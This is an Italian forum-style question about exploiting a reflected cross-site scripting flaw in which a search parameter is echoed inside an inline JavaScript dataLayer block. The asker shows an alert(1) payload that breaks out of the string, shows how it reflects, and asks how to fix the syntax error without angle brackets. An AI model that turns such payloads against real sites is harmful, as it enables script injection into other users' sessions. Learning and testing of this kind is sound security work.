Sto cercando di sfruttare uno script cross site riflesso in una richiesta GET in cui il riflesso si trova nel primo blocco di script a più righe.
Sembra che io possa usare ogni carattere tranne <
, >
e "
e il miglior carico utile che potrei inventare è
/?search='}]%3Balert(1)%3B%2F%2F
E si riflette così:
<head><script>
dataLayer = [{
'pageType': 'Page',
'category': 'Search',
'searchTerm': ''}];alert(1);//',
'searchResults': '0',
}];
</script>
Purtroppo questo non funziona. Né lo fa con / * anziché // per commentare il resto del blocco di script. C'è un modo per farlo funzionare senza usare "<" e ">"? Ora fallisce con "SyntaxError: Token inaspettato: ':'"